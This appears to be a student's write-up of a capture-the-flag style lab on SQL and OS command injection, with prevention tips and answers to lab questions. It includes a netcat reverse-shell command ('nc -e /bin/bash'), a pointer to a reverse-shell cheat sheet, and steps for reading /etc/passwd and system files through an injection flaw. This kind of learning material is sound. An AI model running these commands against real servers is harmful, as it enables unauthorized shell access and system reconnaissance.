Injection

Date: 26, December, 2020

Author: Dhilip Sanjay S

• Injection flaws occur because user controlled input is interpreted as actual commands or parameters by the application.

SQL Injection

• Access, Modify and Delte Information in a database.

OS Command Injection

• Execute arbitrary system commands on a server that would allow an attacker to gain access to users' system.

• Can be used to open up a reverse shell.

  Copy

  nc -e /bin/bash

• Pentest Monkey Reverse Shell Cheatsheet

• Types:

  • Blind Command Injection - when the system command made to the server does not return the response to the user in the HTML document.

  • Active Command Injection - return the response to the user. It can be made visible through several HTML elements.

Preventing Injection Attacks

• Using an allow list (white list)

• Stripping input (that contains dangerous characters)

Note: There are various libraries that perform these tasks.

Command Injection Practical

• PHP passthru() function - executes what gets entered into the input, then passsing the output directly to the browser.

• passthru() Documentation

• Warning: When allowing user-supplied data to be passed to this function, use escapeshellarg() or escapeshellcmd() to ensure that users cannot trick the system into executing arbitrary commands.

• Ways to Detect Active Command Injection

  • Linux

  • Windows

Solutions

What strange text file is in the website root directory?

• Answer: drpepper.txt

How many non-root/non-service/non-daemon users are there?

• Answer: 0

• Steps to Reproduce:

• The /etc/passwd file is a colon-separated file that contains the following information:

1. Username: It is used when user logs in. It should be between 1 and 32 characters in length.

2. Password: An x character indicates that encrypted password is stored in /etc/shadow file. Please note that you need to use the passwd command to computes the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file.

3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.

4. Group ID (GID): The primary group ID (stored in /etc/group file)

5. User ID Info: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command.

6. Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /

7. Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell. For example, sysadmin can use the nologin shell, which acts as a replacement shell for the user accounts. If shell set to /sbin/nologin and the user tries to log in to the Linux system directly, the /sbin/nologin shell closes the connection.

What user is this app running as?

• Answer: www-data

• Steps to Reproduce: whoami

What is the user's shell set as?

• Answer: /usr/sbin/nologin

• Steps to Reproduce:

What version of Ubuntu is running?

• Answer: 18.04.4

• Steps to Reproduce:

Print out the MOTD. What favorite beverage is shown?

• Answer: DR PEPPER

• Steps to Reproduce:

  • This question took a lot of time for me to solve.

  • On googling what is motd in linux : /etc/motd is a file on Unix-like systems that contains a "message of the day".

  • So, I entered the command cat /etc/motd, but there was no output.

  • Next, I used locate command to find the location of motd : locate motd

  • It seemed like update-motd.d was a directory, so I listed the files inside the directory : ls /etc/update-motd.d

  • The hint said 00-header, so I printed the contents of this file : cat /etc/update-motd.d/00-header

  • The last line was DR PEPPER MAKES THE WORLD TASTE BETTER!.

  • As expected DR PEPPER was the answer.